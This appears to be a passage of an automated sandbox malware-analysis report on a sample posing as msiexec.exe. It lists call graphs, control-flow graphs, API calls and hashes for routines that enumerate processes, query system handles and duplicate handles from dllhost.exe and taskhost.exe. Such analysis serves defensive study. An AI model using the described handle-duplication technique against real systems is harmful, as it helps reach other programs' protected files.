11 API calls 39684->39848 39685 43ae3a memset 39686 43ae73 39685->39686 39849 42e1c0 146 API calls 39686->39849 39687 43adab 39846 438c4e 162 API calls 39687->39846 39688 43ad6c 39688->39650 39688->39687 39845 42370b memset memcpy memset 39688->39845 39692 43adcc 39847 440f84 12 API calls 39692->39847 39693 43ae96 39850 42e1c0 146 API calls 39693->39850 39696 43aea8 39697 43aec1 39696->39697 39851 42e199 146 API calls 39696->39851 39698 43af00 39697->39698 39852 42e1c0 146 API calls 39697->39852 39698->39650 39702 43af1a 39698->39702 39703 43b3d9 39698->39703 39853 438eed 16 API calls 39702->39853 39708 43b3f6 39703->39708 39712 43b4c8 39703->39712 39704 43b60f 39704->39650 39912 4393a5 17 API calls 39704->39912 39707 43af2f 39854 4233c5 16 API calls 39707->39854 39894 432878 12 API calls 39708->39894 39710 43af51 39855 423426 11 API calls 39710->39855 39718 43b4f2 39712->39718 39900 42bbd5 memcpy memcpy memcpy memset memcpy 39712->39900 39714 43af7d 39856 423426 11 API calls 39714->39856 39901 43a76c 21 API calls 39718->39901 39719 43b529 39902 44081d 162 API calls 39719->39902 39720 43b462 39896 423330 11 API calls 39720->39896 39721 43af94 39857 423330 11 API calls 39721->39857 39725 43afca 39858 423330 11 API calls 39725->39858 39726 43b47e 39730 43b497 39726->39730 39897 42374a memcpy memset memcpy memcpy memcpy 39726->39897 39727 43b544 39731 43b55c 39727->39731 39903 42c02e memset 39727->39903 39728 43b428 39728->39720 39895 432b60 16 API calls 39728->39895 39898 4233ae 11 API calls 39730->39898 39904 43a87a 162 API calls 39731->39904 39733 43afdb 39859 4233ae 11 API calls 39733->39859 39738 43b56c 39742 43b58a 39738->39742 39905 423330 11 API calls 39738->39905 39739 43b4b1 39899 423399 11 API calls 39739->39899 39741 43afee 39860 44081d 162 API calls 39741->39860 39906 440f84 12 API calls 39742->39906 39743 43b4c1 39908 42db80 162 API calls 39743->39908 39748 43b592 39907 43a82f 16 API calls 39748->39907 39751 43b5b4 39909 438c4e 162 API calls 39751->39909 39753 43b5cf 39910 42c02e memset 39753->39910 39755 43b005 39755->39650 39759 43b01f 39755->39759 39861 42d836 162 API calls 39755->39861 39756 43b1ef 39871 4233c5 16 API calls 39756->39871 39759->39756 39869 423330 11 API calls 39759->39869 39870 42d71d 162 API calls 39759->39870 39760 43b212 39872 423330 11 API calls 39760->39872 39762 43b087 39862 4233ae 11 API calls 39762->39862 39763 43add4 39763->39704 39911 438f86 16 API calls 39763->39911 39766 43b22a 39873 42ccb5 11 API calls 39766->39873 39769 43b23f 39874 4233ae 11 API calls 39769->39874 39770 43b10f 39865 423330 11 API calls 39770->39865 39772 43b257 39875 4233ae 11 API calls 39772->39875 39776 43b129 39866 4233ae 11 API calls 39776->39866 39777 43b26e 39876 4233ae 11 API calls 39777->39876 39780 43b09a 39780->39770 39863 42cc15 19 API calls 39780->39863 39864 4233ae 11 API calls 39780->39864 39781 43b282 39877 43a87a 162 API calls 39781->39877 39783 43b13c 39867 440f84 12 API calls 39783->39867 39785 43b29d 39878 423330 11 API calls 39785->39878 39788 43b15f 39868 4233ae 11 API calls 39788->39868 39789 43b2af 39790 43b2b8 39789->39790 39791 43b2ce 39789->39791 39879 4233ae 11 API calls 39790->39879 39880 440f84 12 API calls 39791->39880 39795 43b2c9 39882 4233ae 11 API calls 39795->39882 39796 43b2da 39881 42370b memset memcpy memset 39796->39881 39799 43b2f9 39883 423330 11 API calls 39799->39883 39801 43b30b 39884 423330 11 API calls 39801->39884 39803 43b325 39885 423399 11 API calls 39803->39885 39805 43b332 39886 4233ae 11 API calls 39805->39886 39807 43b354 39887 423399 11 API calls 39807->39887 39809 43b364 39888 43a82f 16 API calls 39809->39888 39811 43b370 39889 42db80 162 API calls 39811->39889 39813 43b380 39890 438c4e 162 API calls 39813->39890 39815 43b39e 39891 423399 11 API calls 39815->39891 39817 43b3ae 39892 43a76c 21 API calls 39817->39892 39819 43b3c3 39893 423399 11 API calls 39819->39893 39821->39642 39822->39645 39823->39643 39825 43a6f5 39824->39825 39826 43a765 39824->39826 39825->39826 39913 42a115 39825->39913 39826->39650 39833 4397fd memset 39826->39833 39830 43a73d 39830->39826 39831 42a115 146 API calls 39830->39831 39831->39826 39832->39652 39833->39659 39834->39650 39835->39674 39836->39663 39837->39667 39838->39664 39839->39668 39840->39672 39841->39676 39842->39678 39843->39681 39844->39688 39845->39687 39846->39692 39847->39763 39848->39685 39849->39693 39850->39696 39851->39697 39852->39697 39853->39707 39854->39710 39855->39714 39856->39721 39857->39725 39858->39733 39859->39741 39860->39755 39861->39762 39862->39780 39863->39780 39864->39780 39865->39776 39866->39783 39867->39788 39868->39759 39869->39759 39870->39759 39871->39760 39872->39766 39873->39769 39874->39772 39875->39777 39876->39781 39877->39785 39878->39789 39879->39795 39880->39796 39881->39795 39882->39799 39883->39801 39884->39803 39885->39805 39886->39807 39887->39809 39888->39811 39889->39813 39890->39815 39891->39817 39892->39819 39893->39763 39894->39728 39895->39720 39896->39726 39897->39730 39898->39739 39899->39743 39900->39718 39901->39719 39902->39727 39903->39731 39904->39738 39905->39742 39906->39748 39907->39743 39908->39751 39909->39753 39910->39763 39911->39704 39912->39650 39914 42a175 39913->39914 39916 42a122 39913->39916 39914->39826 39919 42b13b 146 API calls 39914->39919 39916->39914 39917 42a115 146 API calls 39916->39917 39920 43a174 39916->39920 39944 42a0a8 146 API calls 39916->39944 39917->39916 39919->39830 39934 43a196 39920->39934 39935 43a19e 39920->39935 39921 43a306 39921->39934 39964 4388c4 14 API calls 39921->39964 39924 42a115 146 API calls 39924->39935 39926 43a642 39926->39934 39968 4169a7 11 API calls 39926->39968 39930 43a635 39967 42c02e memset 39930->39967 39934->39916 39935->39921 39935->39924 39935->39934 39945 42ff8c 39935->39945 39953 415a91 39935->39953 39957 4165ff 39935->39957 39960 439504 13 API calls 39935->39960 39961 4312d0 146 API calls 39935->39961 39962 42be4c memcpy memcpy memcpy memset memcpy 39935->39962 39963 43a121 11 API calls 39935->39963 39937 42bf4c 14 API calls 39939 43a325 39937->39939 39938 4169a7 11 API calls 39938->39939 39939->39926 39939->39930 39939->39934 39939->39937 39939->39938 39940 42b5b5 memset memcpy 39939->39940 39943 4165ff 11 API calls 39939->39943 39965 42b63e 14 API calls 39939->39965 39966 42bfcf memcpy 39939->39966 39940->39939 39943->39939 39944->39916 39969 43817e 39945->39969 39947 42ff9d 39947->39935 39948 42ff99 39948->39947 39949 42ffe3 39948->39949 39950 42ffd0 39948->39950 39974 4169a7 11 API calls 39949->39974 39973 4169a7 11 API calls 39950->39973 39954 415a9d 39953->39954 39955 415ab3 39954->39955 39956 415aa4 memset 39954->39956 39955->39935 39956->39955 40125 4165a0 39957->40125 39960->39935 39961->39935 39962->39935 39963->39935 39964->39939 39965->39939 39966->39939 39967->39926 39968->39934 39970 438187 39969->39970 39972 438192 39969->39972 39975 4380f6 39970->39975 39972->39948 39973->39947 39974->39947 39977 43811f 39975->39977 39976 438164 39976->39972 39977->39976 39980 437e5e 39977->39980 40003 4300e8 memset memset memcpy 39977->40003 40004 437d3c 39980->40004 39982 437eb3 39982->39977 39983 437ea9 39983->39982 39988 437f22 39983->39988 40019 41f432 39983->40019 39986 437f06 40066 415c56 11 API calls 39986->40066 39990 437f7f 39988->39990 39991 432d4e 3 API calls 39988->39991 39989 437f95 40067 415c56 11 API calls 39989->40067 39990->39989 39992 43802b 39990->39992 39991->39990 39995 4165ff 11 API calls 39992->39995 39994 437fa3 39994->39982 40070 41f638 103 API calls 39994->40070 39996 438054 39995->39996 40030 437371 39996->40030 39999 43806b 40000 438094 39999->40000 40068 42f50e 137 API calls 39999->40068 40000->39994 40069 4300e8 memset memset memcpy 40000->40069 40003->39977 40005 437d69 40004->40005 40008 437d80 40004->40008 40071 437ccb 11 API calls 40005->40071 40007 437d76 40007->39983 40008->40007 40009 437da3 40008->40009 40010 437d90 40008->40010 40012 438460 133 API calls 40009->40012 40010->40007 40075 437ccb 11 API calls 40010->40075 40015 437dcb 40012->40015 40013 437de8 40074 424f26 122 API calls 40013->40074 40015->40013 40072 444283 13 API calls 40015->40072 40017 437dfc 40073 437ccb 11 API calls 40017->40073 40020 41f44f 40019->40020 40021 41f54d 40019->40021 40022 41f466 40020->40022 40028 41f50b 40020->40028 40076 41f1a5 40020->40076 40101 41c06f memcmp 40020->40101 40102 41f3b1 89 API calls 40020->40102 40103 41f398 85 API calls 40020->40103 40021->40022 40105 41c635 memset memset 40021->40105 40022->39986 40022->39988 40028->40021 40028->40022 40104 41c295 85 API calls 40028->40104 40106 41703f 40030->40106 40032 437399 40033 43739d 40032->40033 40035 4373ac 40032->40035 40113 4446ea 11 API calls 40033->40113 40036 416935 16 API calls 40035->40036 40052 4373ca 40036->40052 40037 437584 40039 4375bc 40037->40039 40120 42453e 122 API calls 40037->40120 40038 438460 133 API calls 40038->40052 40121 415c7d 16 API calls 40039->40121 40042 4375d2 40046 4373a7 40042->40046 40122 4442e6 11 API calls 40042->40122 40043 4251c4 136 API calls 40043->40052 40045 4375e2 40045->40046 40123 444283 13 API calls 40045->40123 40046->39999 40048 415a91 memset 40048->40052 40051 43758f 40119 42453e 122 API calls 40051->40119 40052->40037 40052->40038 40052->40043 40052->40048 40052->40051 40065 437d3c 134 API calls 40052->40065 40114 425433 13 API calls 40052->40114 40115 425413 17 API calls 40052->40115 40116 42533e 16 API calls 40052->40116 40117 42538f 16 API calls 40052->40117 40118 42453e 122 API calls 40052->40118 40055 4375f4 40058 437620 40055->40058 40059 43760b 40055->40059 40057 43759f 40060 416935 16 API calls 40057->40060 40062 416935 16 API calls 40058->40062 40124 444283 13 API calls 40059->40124 40060->40037 40062->40046 40064 437612 memcpy 40064->40046 40065->40052 40066->39982 40067->39994 40068->40000 40069->39994 40070->39982 40071->40007 40072->40017 40073->40013 40074->40007 40075->40007 40077 41bc3b 100 API calls 40076->40077 40078 41f1b4 40077->40078 40079 41edad 85 API calls 40078->40079 40086 41f282 40078->40086 40080 41f1cb 40079->40080 40081 41f1f5 memcmp 40080->40081 40082 41f20e 40080->40082 40080->40086 40081->40082 40083 41f21b memcmp 40082->40083 40082->40086 40084 41f326 40083->40084 40087 41f23d 40083->40087 40085 41ee6b 85 API calls 40084->40085 40084->40086 40085->40086 40086->40020 40087->40084 40088 41f28e memcmp 40087->40088 40090 41c8df 55 API calls 40087->40090 40088->40084 40089 41f2a9 40088->40089 40089->40084 40092 41f308 40089->40092 40093 41f2d8 40089->40093 40091 41f269 40090->40091 40091->40084 40094 41f287 40091->40094 40095 41f27a 40091->40095 40092->40084 40099 4446ce 11 API calls 40092->40099 40096 41ee6b 85 API calls 40093->40096 40094->40088 40097 41ee6b 85 API calls 40095->40097 40098 41f2e0 40096->40098 40097->40086 40100 41b1ca memset 40098->40100 40099->40084 40100->40086 40101->40020 40102->40020 40103->40020 40104->40021 40105->40022 40107 417044 40106->40107 40108 41705c 40106->40108 40110 416760 11 API calls 40107->40110 40112 417055 40107->40112 40109 417075 40108->40109 40111 41707a 11 API calls 40108->40111 40109->40032 40110->40112 40111->40107 40112->40032 40113->40046 40114->40052 40115->40052 40116->40052 40117->40052 40118->40052 40119->40057 40120->40039 40121->40042 40122->40045 40123->40055 40124->40064 40130 415cfe 40125->40130 40135 415d23 __aullrem __aulldvrm 40130->40135 40137 41628e 40130->40137 40131 4163ca 40144 416422 11 API calls 40131->40144 40133 416172 memset 40133->40135 40134 416422 10 API calls 40134->40135 40135->40131 40135->40133 40135->40134 40136 415cb9 10 API calls 40135->40136 40135->40137 40136->40135 40138 416520 40137->40138 40139 416527 40138->40139 40143 416574 40138->40143 40141 416544 40139->40141 40139->40143 40145 4156aa 11 API calls 40139->40145 40142 416561 memcpy 40141->40142 40141->40143 40142->40143 40143->39935 40144->40137 40145->40141 40167 41493c EnumResourceNamesW 37548 4287c1 37549 4287d2 37548->37549 37550 429ac1 37548->37550 37551 428818 37549->37551 37552 42881f 37549->37552 37567 425711 37549->37567 37562 425ad6 37550->37562 37618 415c56 11 API calls 37550->37618 37585 42013a 37551->37585 37613 420244 96 API calls 37552->37613 37557 4260dd 37612 424251 119 API calls 37557->37612 37559 4259da 37611 416760 11 API calls 37559->37611 37563 429a4d 37568 429a66 37563->37568 37569 429a9b 37563->37569 37566 422aeb memset memcpy memcpy 37566->37567 37567->37550 37567->37559 37567->37563 37567->37566 37573 4260a1 37567->37573 37581 4259c2 37567->37581 37584 425a38 37567->37584 37601 4227f0 memset memcpy 37567->37601 37602 422b84 15 API calls 37567->37602 37603 422b5d memset memcpy memcpy 37567->37603 37604 422640 13 API calls 37567->37604 37606 4241fc 11 API calls 37567->37606 37607 42413a 89 API calls 37567->37607 37614 415c56 11 API calls 37568->37614 37572 429a96 37569->37572 37616 416760 11 API calls 37569->37616 37617 424251 119 API calls 37572->37617 37610 415c56 11 API calls 37573->37610 37575 429a7a 37615 416760 11 API calls 37575->37615 37581->37562 37605 415c56 11 API calls 37581->37605 37584->37581 37608 422640 13 API calls 37584->37608 37609 4226e0 12 API calls 37584->37609 37586 42014c 37585->37586 37589 420151 37585->37589 37628 41e466 96 API calls 37586->37628 37588 420162 37588->37567 37589->37588 37590 4201b3 37589->37590 37591 420229 37589->37591 37592 4201b8 37590->37592 37593 4201dc 37590->37593 37591->37588 37594 41fd5e 85 API calls 37591->37594 37619 41fbdb 37592->37619 37593->37588 37598 4201ff 37593->37598 37625 41fc4c 37593->37625 37594->37588 37598->37588 37600 42013a 96 API calls 37598->37600 37600->37588 37601->37567 37602->37567 37603->37567 37604->37567 37605->37559 37606->37567 37607->37567 37608->37584 37609->37584 37610->37559 37611->37557 37612->37562 37613->37567 37614->37575 37615->37572 37616->37572 37617->37550 37618->37559 37620 41fbf1 37619->37620 37621 41fbf8 37619->37621 37624 41fc39 37620->37624 37643 4446ce 11 API calls 37620->37643 37633 41ee26 37621->37633 37624->37588 37629 41fd5e 37624->37629 37626 41ee6b 85 API calls 37625->37626 37627 41fc5d 37626->37627 37627->37593 37628->37589 37632 41fd65 37629->37632 37630 41fdab 37630->37588 37631 41fbdb 85 API calls 37631->37632 37632->37630 37632->37631 37634 41ee41 37633->37634 37635 41ee32 37633->37635 37644 41edad 37634->37644 37647 4446ce 11 API calls 37635->37647 37639 41ee3c 37639->37620 37641 41ee58 37641->37639 37649 41ee6b 37641->37649 37643->37624 37653 41be52 37644->37653 37647->37639 37648 41eb85 11 API calls 37648->37641 37650 41ee70 37649->37650 37651 41ee78 37649->37651 37706 41bf99 85 API calls 37650->37706 37651->37639 37654 41be6f 37653->37654 37655 41be5f 37653->37655 37660 41be8c 37654->37660 37685 418c63 memset memset 37654->37685 37684 4446ce 11 API calls 37655->37684 37657 41be69 37657->37639 37657->37648 37660->37657 37661 41bf3a 37660->37661 37662 41bed1 37660->37662 37664 41bee7 37660->37664 37688 4446ce 11 API calls 37661->37688 37665 41bef0 37662->37665 37668 41bee2 37662->37668 37664->37657 37689 41a453 85 API calls 37664->37689 37665->37664 37667 41bf01 37665->37667 37666 41bf24 memset 37666->37657 37667->37666 37670 41bf14 37667->37670 37686 418a6d memset memcpy memset 37667->37686 37674 41ac13 37668->37674 37687 41a223 memset memcpy memset 37670->37687 37673 41bf20 37673->37666 37675 41ac52 37674->37675 37676 41ac3f memset 37674->37676 37678 41ac6a 37675->37678 37690 41dc14 19 API calls 37675->37690 37681 41acd9 37676->37681 37680 41aca1 37678->37680 37691 41519d 37678->37691 37680->37681 37682 41acc0 memset 37680->37682 37683 41accd memcpy 37680->37683 37681->37664 37682->37681 37683->37681 37684->37657 37685->37660 37686->37670 37687->37673 37688->37664 37690->37678 37694 4175ed 37691->37694 37702 417570 SetFilePointer 37694->37702 37697 41760a ReadFile 37698 417637 37697->37698 37699 417627 GetLastError 37697->37699 37700 4151b3 37698->37700 37701 41763e memset 37698->37701 37699->37700 37700->37680 37701->37700 37703 4175b2 37702->37703 37704 41759c GetLastError 37702->37704 37703->37697 37703->37700 37704->37703 37705 4175a8 GetLastError 37704->37705 37705->37703 37706->37651 37707 417bc5 37708 417c61 37707->37708 37709 417bda 37707->37709 37709->37708 37710 417bf6 UnmapViewOfFile CloseHandle 37709->37710 37712 417c2c 37709->37712 37714 4175b7 37709->37714 37710->37709 37710->37710 37712->37709 37719 41851e 18 API calls 37712->37719 37715 4175d6 CloseHandle 37714->37715 37716 4175c8 37715->37716 37717 4175df 37715->37717 37716->37717 37718 4175ce Sleep 37716->37718 37717->37709 37718->37715 37719->37712 39624 4147f3 39627 414561 39624->39627 39626 414813 39628 41456d 39627->39628 39629 41457f GetPrivateProfileIntW 39627->39629 39632 4143f1 memset _itow WritePrivateProfileStringW 39628->39632 39629->39626 39631 41457a 39631->39626 39632->39631

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 354->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 372 40dff8-40dffb 370->372 373 40defd-40df02 370->373 371->370 374 40ded0-40dee1 _wcsicmp 371->374 372->363 375 40dffd-40e006 372->375 376 40df08 373->376 377 40dfef-40dff2 CloseHandle 373->377 374->370 374->375 375->362 375->363 378 40df0b-40df10 376->378 377->372 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 0040DDAD
                                                                                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                          • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                            • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                          • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                          • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                          • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                          • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                          • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                          • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                          • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                          • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                          • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                          • memset.MSVCRT ref: 0040DF5F
                                                                                                          • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                                          • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                          • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                          • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                          • API String ID: 708747863-3398334509
                                                                                                          • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                          • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                          • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                          • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 636 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 639 413f00-413f11 Process32NextW 636->639 640 413da5-413ded OpenProcess 639->640 641 413f17-413f24 CloseHandle 639->641 642 413eb0-413eb5 640->642 643 413df3-413e26 memset call 413f27 640->643 642->639 644 413eb7-413ebd 642->644 649 413e79-413e9d call 413959 call 413ca4 643->649 650 413e28-413e35 643->650 646 413ec8-413eda call 4099f4 644->646 647 413ebf-413ec6 free 644->647 651 413edb-413ee2 646->651 647->651 663 413ea2-413eae CloseHandle 649->663 654 413e61-413e68 650->654 655 413e37-413e44 GetModuleHandleW 650->655 656 413ee4 651->656 657 413ee7-413efe 651->657 654->649 660 413e6a-413e76 654->660 655->654 659 413e46-413e5c GetProcAddress 655->659 656->657 657->639 659->654 660->649 663->642
                                                                                                          APIs
                                                                                                            • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                                                          • memset.MSVCRT ref: 00413D7F
                                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                          • memset.MSVCRT ref: 00413E07
                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                          • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                                          • free.MSVCRT ref: 00413EC1
                                                                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                                          • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                          • API String ID: 1344430650-1740548384
                                                                                                          • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                          • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                          • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                          • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                                                          APIs
                                                                                                          • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                          • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Resource$FindLoadLockSizeof
                                                                                                          • String ID:
                                                                                                          • API String ID: 3473537107-0
                                                                                                          • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                          • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                          • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                          • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                          APIs
                                                                                                            • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                            • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                            • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                          • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                          • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                          • free.MSVCRT ref: 00418803
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 1355100292-0
                                                                                                          • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                          • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                          • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                          • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                          APIs
                                                                                                          • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                          • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileFind$FirstNext
                                                                                                          • String ID:
                                                                                                          • API String ID: 1690352074-0
                                                                                                          • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                          • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                          • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                          • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 0041898C
